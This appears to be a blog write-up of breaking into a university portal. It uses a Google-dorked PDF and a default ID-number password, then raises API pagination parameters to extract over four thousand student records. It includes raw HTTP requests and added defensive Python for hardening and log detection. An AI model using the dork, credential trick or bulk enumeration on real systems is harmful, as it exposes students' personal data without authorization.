How a Simple API Parameter Leak Exposed Thousands of Student Records
This article details the discovery and exploitation of an API‑based information leakage in a university system, showing how default passwords, missing parameters, and directory depth allowed an attacker to retrieve thousands of student records, and concludes with lessons for security testing.
0x00 Vulnerability Cause
The issue started when a PDF containing a student's personal information was found via a Google dork (inurl:xxx.edu.cn pdf). The PDF revealed the student's ID and ID number, and the university's unified login used the last six digits of the ID number as the default password, which allowed direct login as that student.
After logging in, only the "daily affairs" module was accessible.
0x01 Vulnerability Discovery
Testing revealed no SQL injection or file upload vulnerabilities, but many endpoints lacked permission checks. A feedback API was found, and the following crafted request was sent:
POST /api/apps/feedback HTTP/1.1
Host: xxx.xxx.xxx:80
Content-Length: 79
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
Content-Type: application/json;charset=UTF-8
Origin: http://xxx.xxx.xxx:80
Referer: http://xxx.xxx.xxx:80/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ko;q=0.5,zh-TW;q=0.4
Cookie: sid=7e670c0c-9529-4a1b-87b6-6c6aec4edbc1
Connection: close
{"jybh":"d997E5ee-17B6-6C9A-13c1-83EAFE09F831","bt":"1","yddh":"11","jynr":"1"}

The API required the additional parameters pageNum and pageSize. Appending them made the response return a single student's information, and adjusting their values revealed more records.
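The flaw described above is an authenticated-but-unauthorized listing endpoint that honours whatever pageNum and pageSize the caller supplies. The following Python model, added here and not code from the university system, shows that behaviour beside a hardened version that scopes the result set to the caller before paginating and clamps the page size server-side. The records, session ids, the XS/ADMIN roles and the MAX_PAGE_SIZE value are all constructed assumptions.

```python
# Added example: toy model of a paginated "user basic info" endpoint,
# as the write-up describes it and then hardened. Not the real system's code.

# Constructed sample records; field names are hypothetical stand-ins
STUDENTS = [
    {"id": f"2019{n:04d}", "name": f"student-{n}", "phone": f"189xxxx{n:04d}"}
    for n in range(1, 4201)
]

# Constructed sessions: session id -> (user id, roles). Role names assumed.
SESSIONS = {
    "sid-student": ("20190007", ["XS"]),     # an ordinary student
    "sid-admin":   ("admin-1",  ["ADMIN"]),  # a hypothetical admin role
}

MAX_PAGE_SIZE = 50  # assumed server-side cap


class Forbidden(Exception):
    pass


def vulnerable_list(sid, page_num=1, page_size=10):
    """Behaviour the article describes: the endpoint checks only that a
    session exists, never whose data is requested, and trusts pageSize."""
    if sid not in SESSIONS:
        raise Forbidden("not logged in")
    start = (page_num - 1) * page_size
    return STUDENTS[start:start + page_size]


def hardened_list(sid, page_num=1, page_size=10):
    """Hardened: object-level authorization first, then bounded paging."""
    if sid not in SESSIONS:
        raise Forbidden("not logged in")
    user_id, roles = SESSIONS[sid]
    page_num = max(1, int(page_num))
    # Clamp the page size so no single request can bulk-export the table
    page_size = min(max(1, int(page_size)), MAX_PAGE_SIZE)
    # A student's scope is their own record only; an admin may list all
    if "ADMIN" in roles:
        scope = STUDENTS
    else:
        scope = [s for s in STUDENTS if s["id"] == user_id]
    start = (page_num - 1) * page_size
    return scope[start:start + page_size]


def records_reachable(handler, sid, page_size=1000, pages=5):
    """Regression check for the fix: replay the pageNum=1..5 / pageSize=1000
    pattern from the write-up against a handler and count what comes back."""
    total = 0
    for page in range(1, pages + 1):
        total += len(handler(sid, page, page_size))
    return total


if __name__ == "__main__":
    print("vulnerable, student session:", records_reachable(vulnerable_list, "sid-student"))
    print("hardened,   student session:", records_reachable(hardened_list, "sid-student"))
    print("hardened,   admin session:  ", records_reachable(hardened_list, "sid-admin"))
```

The point of `records_reachable` is that it belongs in the service's test suite: a student session against the hardened handler must never see more than its own record, regardless of the paging parameters supplied.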
0x02 Deep Exploitation
Further testing showed that the information leak stemmed from the system's API design. By switching the request method to GET and removing the request body, the attacker could enumerate records using the pageNum and pageSize parameters.
POST /api/base/user/basic/update HTTP/1.1
Host: xxx.xxx.xxx:80
Content-Length: 748
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
Content-Type: application/json;charset=UTF-8
Origin: http://xxx.xxx.xxx:80
Referer: http://xxx.xxx.xxx:80/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ko;q=0.5,zh-TW;q=0.4
Cookie: sid=7e670c0c-9529-4a1b-87b6-6c6aec4edbc1
Connection: close
{"yhbh":"xxxxxxxxxxxx","xm":"xxx","nc":"1","zt":"0","pxh":0,"yddh":"189xxxxxxx","dzyx":"xxxxxxxxxxxx","qq":null,"wechatUnion":null,"wechatOpenid":null,"salt":"test","xbm":"1","yhlx":"0","tx":"xxxxxxxxxxxx_avatar","pf":"defaultSkin","bmmc":"19xx1","bmbh":"xxxxxxxxxxxx","jzbmbh":[],"yhjs":["XS"],"positionIds":null,"userLog":{"bh":"7d83f326-7cee-4ad4-b242-17faef9fdc90","yhbh":"xxxxxxxxxxxx","dlsj":"2023-02-12 23:12:40","tcsj":"2023-02-13 11:22:25","khdczxt":"Windows","khdllq":"Chrome-110.0.0.0","khdipdz":"117.92.247.178","khdlx":"PC"},"gwbh":[],"gwmc":[],"sfzjh":null,"personalSkin":null,"personalSkinThum":null,"value":null,"id":"xxxxxxxxxxxx","nickname":"1","phone":"18xxxxxx","email":"[email protected]"}

Requests to paths three directory levels deep were accepted, while deeper paths were blocked. By iterating pageNum from 1 to 5 with pageSize=1000, each request returned up to a thousand records, and the personal data of over four thousand students was obtained in total.
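The enumeration above leaves a distinctive trace in the web server's access log: one session walking consecutive pageNum values with an oversized pageSize on the same collection path. The following Python detector, an added example rather than anything from the original write-up, parses a constructed access log and flags such sessions. The log format (timestamp, client IP, session id, method, request target, status, response bytes), the endpoint path and the thresholds are all assumptions.

```python
# Added example: flag paginated bulk retrieval in access logs.
# Log format, paths, IPs and session ids below are constructed for illustration.
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

SAMPLE_LOG = """\
2023-02-13T11:20:01 203.0.113.5 sid-a GET /api/base/user/basic?pageNum=1&pageSize=1000 200 812340
2023-02-13T11:20:03 203.0.113.5 sid-a GET /api/base/user/basic?pageNum=2&pageSize=1000 200 811902
2023-02-13T11:20:05 203.0.113.5 sid-a GET /api/base/user/basic?pageNum=3&pageSize=1000 200 812077
2023-02-13T11:20:07 203.0.113.5 sid-a GET /api/base/user/basic?pageNum=4&pageSize=1000 200 811655
2023-02-13T11:20:09 203.0.113.5 sid-a GET /api/base/user/basic?pageNum=5&pageSize=1000 200 164201
2023-02-13T11:21:00 198.51.100.9 sid-b GET /api/base/user/basic?pageNum=1&pageSize=10 200 1203
2023-02-13T11:21:30 198.51.100.9 sid-b POST /api/apps/feedback 200 57
"""

# One line: ts ip sid method target status bytes (assumed format)
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, sid, method, target, status, size = m.groups()
    url = urlparse(target)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"ts": ts, "ip": ip, "sid": sid, "method": method, "path": url.path,
            "query": query, "status": int(status), "size": int(size)}


def find_enumeration(log_text, max_page_size=100, max_pages=3):
    """Return {(sid, path): [reasons]} for sessions that either requested a
    pageSize above max_page_size or touched more than max_pages distinct
    pageNum values on the same path. Only successful (200) responses count,
    since those are the ones that actually returned data."""
    seen = defaultdict(lambda: {"pages": set(), "sizes": set(), "bytes": 0})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["status"] != 200 or "pageNum" not in rec["query"]:
            continue
        entry = seen[(rec["sid"], rec["path"])]
        entry["pages"].add(rec["query"]["pageNum"])
        entry["bytes"] += rec["size"]
        try:
            entry["sizes"].add(int(rec["query"].get("pageSize", "0")))
        except ValueError:
            pass  # non-numeric pageSize: nothing to compare against the cap
    findings = {}
    for key, entry in seen.items():
        reasons = []
        if len(entry["pages"]) > max_pages:
            reasons.append(f"{len(entry['pages'])} distinct pageNum values")
        if entry["sizes"] and max(entry["sizes"]) > max_page_size:
            reasons.append(f"pageSize up to {max(entry['sizes'])}")
        if reasons:
            reasons.append(f"{entry['bytes']} response bytes")
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (sid, path), reasons in find_enumeration(SAMPLE_LOG).items():
        print(f"{sid} on {path}: " + "; ".join(reasons))
```

Keying on the session id rather than the client IP matters here: the write-up's traffic all carried a single sid cookie, and a session that pages through a whole collection is a stronger signal than an address shared by a campus NAT. The response-byte total is included because a student-scoped endpoint returning hundreds of kilobytes per page is itself anomalous even before the paging pattern is considered.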
0x03 Vulnerability Summary
1. Effective information gathering, such as obtaining default credentials, can be crucial for finding vulnerabilities.
2. Persistence is essential; repeated testing eventually uncovered the leak.
3. When an API endpoint is discovered, probing it with different parameters often reveals unintended data exposure.
Programmer DD
A tinkering programmer and author of "Spring Cloud Microservices in Action"